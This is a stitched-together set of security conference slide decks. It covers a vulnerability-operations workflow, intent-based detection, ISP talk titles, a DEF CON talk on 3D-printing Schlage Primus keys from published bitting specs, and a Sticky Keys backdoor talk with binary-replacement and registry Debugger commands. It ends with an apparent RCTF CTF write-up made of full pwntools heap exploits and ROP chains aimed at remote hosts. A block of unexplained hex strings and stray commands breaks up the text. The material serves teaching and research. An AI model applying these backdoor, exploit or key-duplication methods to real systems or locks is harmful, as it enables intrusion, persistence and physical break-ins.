Vulnerability operations: standardized operations process (effectiveness + market)
Vulnerability archiving: standardized archiving process (analysis report + standardized vulnerability format)
How to Collect Vulnerabilities from the Vast Sea of Bugs
Hacker blogs: 离别歌-phith0n, ADog's Blog, bsmali4的小窝, 安全工搬砖笔记, 独自等待-信息安全博客, sky's自留地, 暗月|博客, 0xCC, ...
Hacker conferences: DEFCON, ...
InfoSec news: FreeBuf, RoarTalk, MottoIN, 91Ri.org, SecWiki News, 安全脉搏, 安全盒子, ...
Vulnerabilities/exploits: Exploit-DB, PacketStorm-Exploits, SecurityFocus, Bugtraq, Full Disclosure, Seebug vulnerability community, SCAP Chinese community, ...
Security teams: Google Security, 小黑屋, Web Security Blog – Acunetix, 安全弱点实验室, FireEye Threat Research Blog, 勾陈安全实验室, Tencent Keen Security Lab official blog, Seebug Paper, HackerOne, ...
Security communities: 先知安全技术社区, 吾爱破解, i春秋社区, 看雪论坛, T00LS, BlackHat, 漏洞时代, SRC platforms, 知识星球, ...
How to Tell Low-Value Vulnerabilities from Real Ones
Tier 1: company-wide advisory
Tier 2: security-cloud advisory
Tier 3: Qianlimu (千里目) advisory
Tier 4: catalogued on the platform only
Rating criteria: severity of the vulnerability, how widely the target is deployed, and whether attack details have leaked
How to Handle Vulnerabilities in the Response Phase
Vulnerability defense: IPS rule base and WAF rule base
Vulnerability reproduction: hyper-converged infrastructure and a cloud image registry
Vulnerability advisory: standard template with preface, Qianli encyclopedia entry, vulnerability description, reproduction, affected versions, remediation advice, reference links, and the Sangfor solution
Vulnerability detection: Cloud-Eye (云眼) platform plugins and Cloud-Mirror (云镜) platform plugins
Plugin standardization: plugins are written online, pushed out for testing, then deployed to production
Rule-base standardization: rules are written online, pushed out for testing, then deployed to production
Standardized advisory template: pushed to different contacts according to severity
Docker templates: cloud + endpoint vulnerability-range deployment
How to Track Vulnerabilities
Patch tracking: follow vendor patches
User tracking: push notices to affected customers
Variant tracking: collect variant attack scripts (and other detection approaches) to update the Cloud-Eye plugins; collect variant bypass packets to update the AF rule base
Root-cause tracking: publish root-cause analysis write-ups; find patch-bypass approaches
Impact tracking: measure the distribution of affected targets
How to Run Vulnerability Operations
1 Track variant attacks: collect variant attack scripts (and other detection approaches); analyze the vulnerability's root cause to find patch bypasses
2 Tune rule and plugin accuracy: collect variant bypass packets and update the AF rule base; update the Cloud-Eye platform plugins
3 Deepen impact tracking: devices + cloud platform linked into a big-data platform that measures the distribution of affected targets
How to Archive Vulnerabilities
Vulnerability retrospective
Archived artifacts: detailed analysis document and environment operation document
Vulnerability report: advisory + analysis + data = report
A Tracking Platform Built on the Vulnerability Closed Loop
Backend: Flask
Frontend: AngularJS + Bootstrap
Message queue: RabbitMQ
Deployment: WSGI + Supervisor + gunicorn + nginx
Closed-loop platform components: vulnerability database, rule base, plugin base, image registry
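A minimal sketch of the stated Supervisor + gunicorn deployment; the paths, program name, and app module below are placeholders, not the real configuration:

; /etc/supervisor/conf.d/vuln-platform.conf
[program:vuln-platform]
command=/usr/local/bin/gunicorn -w 4 -b 127.0.0.1:8000 app:app
directory=/opt/vuln-platform
autostart=true
autorestart=true

nginx then reverse-proxies public traffic to 127.0.0.1:8000.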
Closed-loop tracking platform flow: vulnerability collection → vulnerability response → vulnerability tracking → vulnerability operations → vulnerability archiving
Functional architecture: the closed-loop tracking platform feeds the vulnerability database
Database fields: severity level, outbreak date, CVE ID, SF ID, vulnerability name, CNVD ID, Bugtraq ID, analyst, type, link, status, notes, Microsoft bulletin ID, major category, affected object, subcategory, description, affected versions, solution, reference links, detailed analysis document, environment operation document, plugin ID, rule ID
Q&A
Changing the Mindset of Cyber Defense
Detecting the Intent, Not just the Technique
Vadim Pogulievsky
Director of Cyber Research, Verint
About me
•
Vadim Pogulievsky
•
Director of Cyber Research at Verint
•
Building Cyber Security products for last 15 years
•
Previously led Cyber Security Research teams for Finjan, M86
Security and McAfee
Current industry state
Seeing a big picture
Can it be better?
What we should do as an
industry to improve it?
Agenda
“Hackers Attack Every 39 Seconds”
“One in Three Americans Hacked in the Past Year “
“Cyber crime damage costs to hit $6 trillion annually by 2021”
“Around one billion accounts and records were compromised worldwide in 2016 “
“Cyber crime will more than triple the number of unfilled cybersecurity jobs, which
is predicted to reach 3.5 million by 2021”
On the other hand..
So why is this the situation?
+ Because we compare instead of cooperating
+ Because every single security product is built as if it were the only product installed in the customer's network
+ Because the customer has to build a cyber defense ecosystem from products that weren't built to be part of an ecosystem
High FP rate – Why it happens?
According to Cisco 2017 Security Capabilities
Benchmark Study:
“Organizations can investigate only
56 percent of the security alerts
they receive on a given day”
To Alert or Not to Alert?
I see a suspicious JS, but can’t
analyze it properly..
So, will I miss a possible attack
or
Create possible false positive?
Dilemma…
PDF with Obfuscated JS
Detecting malicious technique is not enough
Seeing the entire picture – Is a Must!
Only this way you can understand the intent!
What if it would work this way..
“Hey folks, found a fishy file
sending some traffic to
suspicious domain. Anyone
can take a look?”
“Hi there, scanned it.
Don’t worry, it’s benign, on
my whitelist”
Is seeing it all together a utopia?
Interactive conversation instead of a one-way street
- Ability to answer questions vs. triggering alerts
Automatic investigation
- Investigating every single lead is too much for humans
First Steps to this direction
Security Automation and Orchestration
- Automating some time- and effort-consuming tasks
- Enriching data with internal and external sources
Good start, but not enough!
Let’s look further !
False Positive investigation
[Diagram: a C&C alert investigated by pivoting through the related EXEs and Whois data; verdict: false positive]
True Positive investigation
[Diagram: the same C&C alert investigation; additional related EXEs surface, confirming a true positive]
Building an integrated cyber security ecosystem
Detection
One lead for an attack
should be enough
Forensics data
Collecting in advance for
future investigations
Response
Response in a best
appropriate way
Investigation Engine
Run the investigation process
and make decisions
Summary
Ecosystem
instead of silo
products
Automation as a
central
investigation
platform
Every alert is
investigated
Relevant
forensics data is
available for
investigations
Thank You!
● MikroTik Complete Solution for ISP
● Building and Running a Successful WISP
● MikroTik in Real Life, Full and Low Budget ISP
● X2com and MikroTik: New Core Network Case Study
● How to Build an ISP Business with Mikrotik Only
● Basic Mistakes by ISP's on Network Setup & BGP
● ISP Design – Using MikroTik CHR as a BGP Edge Router
● Providing TriplePlay Services (Internet, VoIP, IPTV) For Small Towns Using Wi-Fi Directional Radio Channels
● Security Challenges for ISPs and WISPs
809f93cbcfe5e45fae5d69ca7e64209c02647660d1a79b52ec6d05071b21f
7ff2e167370e3458522eaa7b0fb81fe21cd7b9dec1c74e7fb668e92e2610
81368d8f30a8b2247d5b1f8974328e9bd491b574285c2f132108a542ea7d3
b301d6f2ba8e532b6e219f3d9608a56d643b8f289cfe96d61ab898b4eab0e
99e1db762ff5645050cea4a95dc03eac0db2ceb3e77d8f17b57cd6e294404
76bf646fce8ff9be94d48aad521a483ee49e1cb53cfd5021bb8b933d2c4a7
e009b567516b20ef876da6ef4158fad40275a960c1efd24c804883ae2735
7c06b032242abefe2442a8d716dddb216ec44ed2d6ce1a60e97d30dbba1fb
f8080b9bfc1bd829dce94697998a6c98e4eb6c9848b02ec10555279221dd
4e350d11b606a7e0f5e88270938f938b6d2f0cc8d62a1fdd709f4a3f1fa2c
f1cf895d29970c5229b6a640c253b9f306185d4e99f4eac83b7ba1a325ef
8395e650e94b155bbf4309f777b70fa8fdc44649f3ab335c1dfdfeb0cdee4
a249a69e692fff9992136914737621f117a7d8d4add6bac5443c002c379fe
5e75b8b5ebbef78f35b00702ced557cf0f30f68ee08b399fc26a3e3367bb
fe022403a9d4c899d8d0cb7082679ba608b69091a016e08ad9e750186b194
116d584de3673994e716e86fbb3945e0c6102bfbd30c48b13872a808091e
4263c93ce53d7f88c62fecb6a948d70e51c19e1049e07df2c70a467bcefee
5d70 7dd5872
0d7d0f7015 11400 891 939549 01922bff2bb 3b7d5d
○ echo "lol" > /var/pdb/system/image
○ reboot
Key Decoding and Duplication Attacks for the
Schlage Primus High-Security Lock
David Lawrence
Robert Johnson
Gabriel Karpman
[email protected]
DEF CON 21
August 3, 2013
Standard pin-tumbler locks
Photo credit: user pbroks13 on Wikimedia Commons. Licensed under GFDL or CC-BY-SA-3.0.
Vulnerabilities
1 Key duplication: get copies made in any hardware store.
2 Manipulation: susceptible to picking, impressioning, etc.
The Schlage Primus
Based on a pin-tumbler lock, but with a second independent locking
mechanism.
Manipulation is possible but extremely difficult. Some people can pick
these in under a minute. Most people cannot.
We will focus on key duplication and the implications thereof.
1
Reverse-engineering the Primus
2
3D modeling Primus keys
3
Fabricating Primus keys
4
What it all means
1
Reverse-engineering the Primus
2
3D modeling Primus keys
3
Fabricating Primus keys
4
What it all means
Security through patents
Look up the patent. . .
Primus service manual
w3.securitytechnologies.com/IRSTDocs/Manual/108482.pdf
(and many other online sources)
Sidebar operation
[Key stamp: DO NOT DUPLICATE / PAT. NO. 4,756,177 / PRIMUS]
Finger pins must be lifted to the correct height.
Finger pins must be rotated to the correct angle.
Disassembly
Fill in any missing details by obtaining a lock and taking it apart.
Photo credit: user datagram on lockwiki.com. Licensed under CC-BY-3.0.
1
Reverse-engineering the Primus
2
3D modeling Primus keys
3
Fabricating Primus keys
4
What it all means
Top bitting specifications
MACS = 7
[Diagram: blade profile with cut positions 1-6 at .231", .3872", .5434", .6996", .8558" and 1.012" from the shoulder; .031" cut root; 100° cut angle]
Depths: 0 = .335", 1 = .320", 2 = .305", 3 = .290", 4 = .275", 5 = .260", 6 = .245", 7 = .230", 8 = .215", 9 = .200"
Increment: .015"
Progression: Two Step
Blade Width: .343"
Depth Tolerance: +.002" -0"
Spacing Tolerance: ±.001"
Side bitting specifications
Schlage doesn’t publish exact dimensions for the side bitting.
Scan 10 keys on flatbed scanner, 1200 dpi, and extract parameters.
Index | Position       | Height from bottom | Horizontal offset
1     | Shallow left   | 0.048 inches       | 0.032 inches left
2     | Deep left      | 0.024 inches       | 0.032 inches left
3     | Shallow center | 0.060 inches       | None
4     | Deep center    | 0.036 inches       | None
5     | Shallow right  | 0.048 inches       | 0.032 inches right
6     | Deep right     | 0.024 inches       | 0.032 inches right
Modeling the side bitting
Design requirements
1 Minimum slope: finger pin must settle to the bottom of its valley.
2 Maximum slope: key must go in and out smoothly.
3 Radiused bottom: matches the radius of a finger pin.
Key cross-section
One shape fits in all Primus locks.
Dictated by physical constraints: the pins (and therefore the control
surfaces) are always in the same place relative to the cylinder housing.
[Diagram: Primus key cross-sections across the keyway families CP, HP, CEP, JP, EFP, FP, FGP, EP, and LP; a single Primus profile fits all of them]
Modeling the key in OpenSCAD
Programming language that compiles to 3D models.
First use to model keys was by Nirav Patel in 2011.
Full implementation of Primus key is a few hundred lines of code.
// top_code is a list of 6 integers.
// side_code is a list of 5 integers.
// If control = true, a LFIC removal key will be created.
module key(top_code, side_code, control = false) {
bow();
difference() {
envelope();
bitting(top_code, control);
sidebar(side_code);
}
}
The result
key([4,9,5,8,8,7], [6,2,3,6,6]);
1
Reverse-engineering the Primus
2
3D modeling Primus keys
3
Fabricating Primus keys
4
What it all means
Hand machining
Materials needed:
Hardware store key blank ($1)
Dremel-type rotary tool ($80)
Calipers ($20)
Cut, measure, and repeat ad nauseum.
Rob can crank one out in less than an hour.
Computer-controlled milling
This is what the Schlage factory does.
High setup cost (hundreds of dollars): not practical for outsourced
one-off jobs.
Keep an eye on low-cost precision micromills.
3D printing
This is the game changing technology.
(From bottom to top, picture shows low resolution plastic, high resolution
plastic, and titanium.)
3D printing results
Working keys out of standard plastic (Shapeways “White Strong and
Flexible”), high-resolution plastic (Shapeways “Frosted Ultra Detail”),
and titanium (from i.materialise) on the first try.
Plastic keys cost $1 to $5. Some strength issues, but workable.
Titanium keys cost $100 and outperform genuine Schlage keys.
Sufficient resolution from all processes.
Over the next few years, expect to see prices decrease further.
1
Reverse-engineering the Primus
2
3D modeling Primus keys
3
Fabricating Primus keys
4
What it all means
Results
Key decoding is easy: now that we know the dimensions, all you
need is a high-resolution photo of a key.
Key duplication is easy: takes $10 and the contents of this talk.
Master key extrapolation is easy: the sidebar is not mastered, so
cracking a Primus system is just like cracking a standard pin-tumbler
system.
Keyless manipulation is still hard: need to start with at least a
photo of a key (or else disassemble a lock).
Our recommendations
Primus should not be used for high-security applications.
Existing Primus installations should reevaluate their security needs.
dlaw, robj, gdkar (DEF CON 21)
Attacking the Schlage Primus
August 3, 2013
28 / 30
Implications
The modeling/printing pipeline translates physical security into
information security.
Patent protection defends against physical reproduction, but does
nothing about the electronic distribution of 3D models.
Once a class of keys has been 3D modeled, there is much more power
in the hands of unskilled attackers.
Future work
Combine the 3D modeling software with existing image-to-key decoding
software and 3D printing services. We envision a one click process: put in
a picture that you’ve snapped of a key and your credit card number, and
get the 3D printed key in the mail a week later.
New York City “master keys” debacle: how long until 3D models become
available? What will happen then?
Sticky Keys to the
Kingdom
PRE-AUTH SYSTEM RCE ON WINDOWS IS MORE COMMON
THAN YOU THINK
DENNIS MALDONADO & TIM MCGUFFIN
LARES
Agenda
• About Us
• Problem Background
• Our Solution
• Statistics
• Prevention / Remediation
• Summary
About Us
• Dennis Maldonado
• Adversarial Engineer – LARES Consulting
• Founder
• Houston Locksport
• Houston Area Hackers Anonymous (HAHA)
• Tim McGuffin
• Red Team Manager – LARES Consulting
• 10-year DEFCON Goon
• DEFCON CTF Participant
• Former CCDC Team Coach
Windows Accessibility Tools
Binary | Description | How to access
C:\Windows\System32\Utilman.exe | Utility Manager | Windows Key + U
C:\Windows\System32\sethc.exe | Accessibility shortcut keys | Shift 5 times
C:\Windows\System32\osk.exe | On-Screen Keyboard | Locate the option on the screen using the mouse
C:\Windows\System32\Magnify.exe | Magnifier | Windows Key + [Equal Sign]
C:\Windows\System32\Narrator.exe | Narrator | Windows Key + Enter
C:\Windows\System32\DisplaySwitch.exe | Display Switcher | Windows Key + P
C:\Windows\System32\AtBroker.exe | Manages switching of apps between desktops | Have osk.exe, Magnify.exe, or Narrator.exe open, then lock the computer; AtBroker.exe is executed upon locking and unlocking
History
• “How to Reset Windows Passwords” websites
• Replace sethc.exe or utilman.exe with cmd.exe
• Reboot, Press Shift 5x or WIN+U
• net user (username) (password)
• Login!
• Nobody ever cleans up after themselves
• Can be used as a backdoor/persistence method
• No Windows Event Logs are generated when backdoor is executed
Implementation
• Binary Replacement
• Replace any of the accessibility tool binaries
• Requires elevated rights
• May require taking ownership of files
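A sketch of the replacement from an elevated prompt; paths assume a default install, and from offline/recovery media the takeown/icacls steps are unnecessary:

takeown /f C:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrators:F
copy /y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe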
• Registry (Debugger Method)
• HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution
Options\sethc.exe
• Debugger REG_SZ C:\Windows\System32\cmd.exe
• Requires elevated rights
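The same registry entry as a one-liner (elevated prompt):

reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f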
Limitations
• Elevated access or offline system required
• Replacing binary must be Digitally Signed
• Replacing binary must exist in \System32\
• Replacing binary must exist in Windows “Protected File” list
• You can’t use any old Binary, but you can cmd.exe /c file.bat
Background
• While working with an Incident Response Team:
• Uncovered dozens of vulnerable servers and workstations via file checks
• Identification was done from the filesystem side
• Missed the Debugger Method
• Missed any unmanaged boxes
• Needed a network-based scanner
Background
• We wanted to write out own network-based tool
• Started down the JavaRDP Path
• Ran across @ztgrace’s PoC script, Sticky Keys Hunter
• It worked, and was a great starting point
• Similar to “Peeping Tom”
• Opens a Remote Desktop connection
• Sends keyboard presses
• Saves screenshot to a file
• Needed bug fixes, additional checks, had a TODO list, but not actively developed
Our Solution
• Automated Command Prompt Detection
• Parallelized scanning of multiple hosts
• Tons of bug fixes
• Error Handling
• Dynamic Timing
• Requires imagemagick, xdotool, bc, parallel
• All packages exist in the Kali repositories
DEMO
Solution - Limitations
• Ties up a Linux VM while scanning
• Needed for window focus and screenshotting
• Will not catch binaries that are replaced with anything other than
cmd.exe
• You get to scroll through screenshots!
• Ran across taskmgr.exe, mmc.exe, other custom applications
Statistics
• On a large Business ISP:
• Over 100,000 boxes scanned
• About 571 Command Prompts (every 1 out of 175)
• All types of Institutions
• Educational Institutions
• Law Offices
• Manufacturing Facilities
• Gaming companies
• Etc…
Recommendations
• Remediation
• Delete or replace the affected file (sethc.exe, utilman.exe, …)
• sfc.exe /scannow
• Remove the affected registry entry
• Prevention and Detection
• Network Level Authentication for Remote Desktop Connection
• Restrict local administrative access
• Enable FDE and protect the key
• End point monitoring
Summary
• Multi-threaded scanner for binary replacement
backdoor with command prompt detection
• TODO:
• Code Cleanup
• Read in nmap output
• Code will be on Github
Questions?
RCTF WriteUp By Nu1L
Author:Nu1L
RCTF WriteUp By Nu1L
Pwn
Pokemon
game
sharing
musl
ezheap
catch_the_frog
unistruct
warmnote
Web
ns_shaft_sql
CandyShop
VerySafe
hiphop
Easyphp
xss it?
EasySQLi
Reverse
sakuretsu
Program Logic:
Reverse Engineering Techniques Used:
Solving:
LoongArch
Valgrind
Hi!Harmony!
dht
two_shortest
Crypto
Uncommon Factors I
Uncommon Factors II
BlockChain
EasyFJump
HackChain
Misc
ezshell
monopoly
checkin
coolcat
welcome_to_rctf
FeedBack
Pwn
Pokemon
There is an overflow when talking to Psyduck.
Use the overflow to corrupt the next chunk's size, leak via the password, then tamper with a pointer to rewrite __free_hook.
from pwn import *
import fuckpy3
context.log_level = 'debug'
# p = process("./Pokemon")
p = remote('123.60.25.24', 8888)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
def launch_gdb():
print(pidof(p))
input()
def xor_str(a,b):
res = ''
for i in range(len(a)):
res += chr(a[i] ^ b[i%8])
return res.bytes()
def add(type,s=0,idx = 0):
p.sendlineafter(":","1")
p.sendlineafter(":",str(type))
if s != 0:
p.sendlineafter("?",str(s))
p.sendlineafter("]",str(idx))
def dele(i,need = False):
p.sendlineafter(":","2")
p.sendlineafter("[0/1]",str(i))
p.sendlineafter("Choice:","1")
if need:
p.sendlineafter(']','Y')
p.sendlineafter(":","aaaaa")
# talk
# p.sendlineafter(":","2")
# p.sendlineafter("]","0")
# p.sendlineafter(":","3")
# for i in range(17):
# p.send(p64(0xdeadbeef) * 2)
for i in range(7):
add(1,0x220)
dele(0)
add(1,0x300)
dele(0)
add(1,0x310)
dele(0)
add(1,0x220)
add(1,0x300,1)
dele(0)
add(1,0x300,0)
for i in range(5):
add(1,0x300,1)
dele(0)
add(2)
p.sendlineafter(":","2")
p.sendlineafter("]","0")
p.sendlineafter(":","3")
for i in range(16):
p.send(p64(0xdeadbeef) * 2)
p.send(p64(0) + p64(4704 + 1))
dele(0,True)
dele(1)
# 01AE9
add(1,0x300)
add(1,0x300,1)
dele(1)
p.sendlineafter(":","3")
p.sendlineafter("]","1")
add(1,0x310,1)
p.sendlineafter(":","3")
p.recvuntil('gem: ')
leak = u64(p.recv(6) + b'\x00\x00') - 2014176
log.info('leak ' + hex(leak))
p.sendlineafter("]","N")
dele(1)
add(1,0x300,0)
add(3,idx=1)
game
The mob (minion) feature has a strange UAF; pre-filling a libc address there gives a leak.
p.sendlineafter(":","2")
p.sendlineafter("]","1")
p.sendlineafter(":","3")
p.sendline(p8(0xaa)*8 + p64(leak + libc.symbols['__free_hook'] - 3 ))
p.sendlineafter(":","3")
p.sendlineafter("]","Y")
p.recvuntil('password:')
p.send(xor_str(b'sh\x00' + p64(leak + libc.symbols['system']),p8(0xaa)*8 ))
dele(0)
p.interactive()
from pwn import *
import re
import fuckpy3
context.log_level = 'debug'
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
# p = process('./game')
p = remote('123.60.25.24', 20000)
def launch_gdb():
# print(pidof(p))
input()
def send_data(s):
p.sendafter('talk to the dragon?',s)
def heal():
return p8(2) + p8(1)
def attack():
return p8(2) + p8(2)
def malloc(s):
return p8(17) + p8(1) + p8(s)
def calloc(s):
return p8(17) + p8(2) + p8(s)
def free():
return p8(18)
def jg(i1,i2):
return p8(8) + p8(i1) + p8(i2)
def add(i1,i2):
return p8(16) + p8(i1) + p8(i2)
def clear_bit(bit,value = 0,idx=0):
return p8(13) + p8(idx) + p8(bit) + p8(value)
def padding():
return p8(2) + p8(4)
payload = b''
payload += calloc(0xb0)
payload += heal() * 4
payload += free()
payload += p8(2) + p8(3)*2 + p8(0x20)
payload += p8(2) + p8(0)
for i in range(6):
payload += calloc(0xb0)
payload += heal()
payload += free()
payload += calloc(0xb0)
payload += heal() *4
# child
payload += free()
payload += malloc(0)
payload += attack() * 10
payload += heal()
payload += attack() * 5
payload += heal() * 2
payload += p8(19)
payload += attack()
payload += heal()
payload += p8(6) + p8(0)
payload += heal()
payload += clear_bit(5)
payload += heal()
payload += clear_bit(4,1,1)
payload += heal()
circle1 = b''
circle1 += heal()
circle1 += heal()
circle1 += jg(2,0)
circle1 += heal()
circle1 += attack()
circle1 += heal()
circle1 += p8(11) + p16(3 + 3+2 +2)
circle1 += heal()
circle1 += add(2,1)
circle1 += heal()
circle1 += p8(9) + p16(0x10000 - 3-3-3-3-8 -2-2-2)
payload += circle1
payload += heal()
payload += padding()
payload += heal()
payload += clear_bit(4)
payload += heal()
payload += clear_bit(4,idx=1)
payload += heal()
payload += clear_bit(4,idx=2)
payload += heal()
payload += clear_bit(3,1,1)
payload += heal()
payload += heal()
payload += circle1
payload += heal()
payload += padding()
payload += heal()
payload += clear_bit(3)
payload += heal()
payload += clear_bit(3,idx=1)
payload += heal()
payload += clear_bit(3,idx=2)
payload += heal()
payload += clear_bit(2,1,1)
payload += heal()
payload += heal()
payload += circle1
payload += heal()
payload += padding()
payload += heal()
payload += clear_bit(2)
payload += heal()
payload += clear_bit(2,idx=1)
payload += heal()
payload += clear_bit(2,idx=2)
payload += heal()
payload += clear_bit(1,1,1)
payload += heal()
payload += heal()
payload += circle1
payload += heal()
payload += padding()
payload += heal()
payload += p8(19)
payload += heal()
payload += free()
payload += heal()
payload += malloc(0x10)
payload += heal()
payload += malloc(0x10)
payload += heal()
payload += malloc(0x10)
payload += heal()
payload += heal()
payload += malloc(0xe0)
payload += heal()
payload += heal()
payload += free()
payload += free()
payload += free()
payload += free()
p.recvuntil('length:')
p.sendline(str(len(payload)))
p.recvuntil(':')
p.send(payload)
for i in range(8):
send_data('aaa\n')
p.recvuntil('dragon\'s attack')
s = p.recvuntil(b'Reprisal')
count1 = len(re.findall(b'Despair',s)) - 3
s = p.recvuntil(b'Reprisal')
count2 = len(re.findall(b'Despair',s))-2
s = p.recvuntil(b'Reprisal')
count3 = len(re.findall(b'Despair',s))-2
s = p.recvuntil(b'Reprisal')
count4 = len(re.findall(b'Despair',s))-2
log.info('leak libc ' + hex(count1))
log.info('leak libc ' + hex(count2))
log.info('leak libc ' + hex(count3))
log.info('leak libc ' + hex(count4))
leak_libc = b'\x90' + (chr(count4) + chr(count3) + chr(count2) + chr(count1)).bytes()
+b'\x7f\x00\x00'
leak_libc = u64(leak_libc) - 2014352
log.info('leak libc ' + hex(leak_libc))
send_data(p64(libc.symbols['__free_hook'] + leak_libc ) + b'\n')
# send_data("/bin/sh\n")
send_data(p64(libc.symbols['system']+ leak_libc) + b'\n')
send_data(p64(libc.symbols['system']+ leak_libc) + b'\n')
launch_gdb()
send_data('/bin/sh\n')
# 0x7f061b34f000
p.interactive()
sharing
Neither show nor edit checks the idx.
from pwn import *
libc = ELF('./libc-2.27.so')
# p = process("./sharing",env={"LD_PRELOAD":"./libc-2.27.so"})
# p = process("chroot . ./sharing".split(' '))
p = remote('124.70.137.88', 30000)
# p = remote('0', 9999)
context.log_level = 'debug'
def launch_gdb():
context.terminal = ['xfce4-terminal', '-x', 'sh', '-c']
gdb.attach(proc.pidof(p)[0])
def add(i,s):
p.sendlineafter(':','1')
p.sendlineafter(':',str(i))
p.sendlineafter(':',str(s))
def move(i,s):
p.sendlineafter(':','2')
p.sendlineafter(':',str(i))
p.sendlineafter(':',str(s))
def show(i):
p.sendlineafter(':','3')
p.sendlineafter(': ',str(i))
def edit(i,s):
p.sendlineafter(':','4')
p.sendlineafter(':',str(i))
p.sendafter(':',s)
add(0,0x500)
add(1,0x500)
move(1,0)
add(2,0x500)
show(2)
p.recvuntil('\x7f\x00\x00')
leak_libc = u64(p.recvuntil('\x7f') + '\x00\x00') - 4111520
log.info("leak libc " + hex(leak_libc))
add(3,0x100)
add(4,0x100)
add(5,0x100)
add(6,0x100)
move(4,3)
move(6,5)
musl
Index -1 gives a free out-of-bounds overflow.
add(7,0x100)
show(7)
leak_heap = u64(p.recv(6) + '\x00\x00')
log.info('leak heap ' + hex(leak_heap)) # 0x55946d498c50 0x561266f75050
fake_chunk = leak_heap - 2704
# fake_index = 374
fake_index = 566
fake_ptr = p64(fake_chunk + 0x30) + p64(fake_chunk + 0x20)
fake_ptr += p64(fake_chunk + 0x60) + p64(0x0000000100000002) + p64(0x100) +
p64(leak_libc + libc.symbols['__free_hook']) \
+ p64(0)+ p64(0x111)
fake_ptr = fake_ptr.ljust(0x50,'\x00')
fake_ptr += p64(0xdeadbeef) * 8
edit(2,fake_ptr)
edit(fake_index,p64(leak_libc + libc.symbols['system']))
add(8,0x100)
add(9,0x100)
edit(8,'/bin/sh\x00')
move(9,8)
p.interactive()
from pwn import *
def add(idx,size,buf):
s.sendlineafter(b">>",b"1")
s.sendlineafter(b"idx?",str(idx).encode())
s.sendlineafter(b"size?",str(size).encode())
s.sendafter(b"Contnet?",buf)
def free(idx):
s.sendlineafter(b">>",b"2")
s.sendlineafter(b"idx?",str(idx).encode())
def show(idx):
s.sendlineafter(b">>",b"3")
s.sendlineafter(b"idx?",str(idx).encode())
# s = process("./r")
s = remote("123.60.25.24","12345")
add(0,3,b"A\n")
# add(1,5,b"BBBB")
for i in range(1,14):
add(i,3,str(i)+"\n")
free(0)
add(14,3,b'1\n')
add(0,0,b'A'*14+p16(0x202)+b"\n")
show(0)
libc = ELF("./libc.so")
libc.address = u64(s.recvuntil("\x7f")[-6:]+b"\x00\x00")-0x298d0a
success(hex(libc.address))
secret_addr = libc.sym['__malloc_context']
free(2)
add(0,0,b'A'*0x10+p64(secret_addr)+p32(0x1000)+b"\n")
show(3)
s.recvuntil(b"Content: ")
secret = u64(s.recv(8))
success(hex(secret))
# add(3,0,b'tttt')
free(4)
free(5)
add(15,0xa9c,'a\n')
fake_meta_addr = libc.address+0x293010
fake_mem_addr = libc.address+0x298df0
fake_mem = p64(fake_meta_addr)+p64(1)
sc = 10 # 0xbc
freeable = 1
last_idx = 1
maplen = 2
fake_meta = p64(libc.sym['__stdin_FILE']-0x18)#next
fake_meta += p64(fake_mem_addr)#priv
fake_meta += p64(fake_mem_addr)
fake_meta += p64(2)
fake_meta += p64((maplen << 12) | (sc << 6) | (freeable << 5) | last_idx)
fake_meta += p64(0)
add(15,0xa9c,b'\x00'*0x550+p64(secret)+p64(0)+fake_meta+b"\n")
add(0,0,b'\x00'*0x20+fake_mem+p64(0)+b"\x00"*0x30+b'\x00'*5+b"\x00"+p16(0x4)+p64(fake_m
em_addr+0xa0)+b"\n")
free(9)
add(1,0xb0,b'123\n')
free(15)
add(15,0xa9c,'123\n')
fake_meta = p64(libc.sym['__stdin_FILE']-0x18)#next
fake_meta += p64(fake_mem_addr)#priv
fake_meta += p64(libc.sym['__stdin_FILE']-0x10)
fake_meta += p64(2)
fake_meta += p64((maplen << 12) | (sc << 6) | (freeable << 5) | last_idx)
fake_meta += p64(0)
add(15,0xa9c,b'\x00'*0x550+p64(secret)+p64(0)+fake_meta+b"\n")
# gdb.attach(s,"dir ./mallocng\nb *$rebase(0xd16)\nc")
s.sendlineafter(b">>",b"1")
s.sendlineafter(b"idx?",str(0).encode())
s.sendlineafter(b"size?",str(0xb0).encode())
ret = libc.address+0x0000000000000598
pop_rdi = libc.address+0x0000000000014b82
pop_rsi = libc.address+0x000000000001b27a
pop_rdx = libc.address+0x0000000000009328
mov_rsp = libc.address+0x000000000004a5ae
payload =
p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(libc.sym['__stdout_FILE']-64)+p64(pop_rdx)+p64(0x3
00)
payload += p64(libc.sym['read'])
payload = payload.ljust(64,b'\x00')
payload +=
b'A'*32+p64(1)+p64(1)+p64(libc.sym['__stdout_FILE']-64)+p64(ret)+p64(3)+p64(mov_rsp)+b"
\n"
s.send(payload)
payload = b'/home/ctf/flag/flag\x00'
payload = payload.ljust(24,b'\x00')
payload +=
p64(pop_rdi)+p64(libc.sym['__stdout_FILE']-64)+p64(pop_rsi)+p64(0)+p64(libc.sym['open']
)
payload +=
p64(pop_rdi)+p64(3)+p64(pop_rsi)+p64(libc.sym['__stdout_FILE']+0x100)+p64(pop_rdx)+p64(
0x50)+p64(libc.sym['read'])
payload +=
p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(libc.sym['__stdout_FILE']+0x100)+p64(pop_rdx)+p64(
0x500)+p64(libc.sym['write'])
s.send(payload)
s.interactive()
ezheap
Every index in the menu features can go out of bounds.
Via an offset from the GOT you gain read/write on libc's BSS. Then nudge stdout's vtable pointer by a small offset so it lands on a nearby vtable where the puts path ends up calling free(stdout + fixed offset); lay out ";sh\x00" near that fixed offset, then rewrite __free_hook.
from pwn import *
context.log_level="debug"
p=remote('123.60.25.24',20077)#process("./ezheap")
libc=ELF("./libc.so.6")
sla=lambda y,x:p.sendlineafter(y,x)
def leakoff(off):
#base 0xf7fcc5c0 free_hook:0xf7fcd8d0 stdout:0xf7fccd80
sla("choice>>","3")
sla("type ","3")
sla("idx>>","-2071")
sla("_idx",str(off))
p.recvuntil("value>>\n")
return int(p.recvline())
def editoff(off,val):
sla("choice>>","2")
sla("type ","3")
sla("idx>>","-2071")
sla("_idx",str(off))
p.recvuntil("value>>")
p.sendline(str(val))
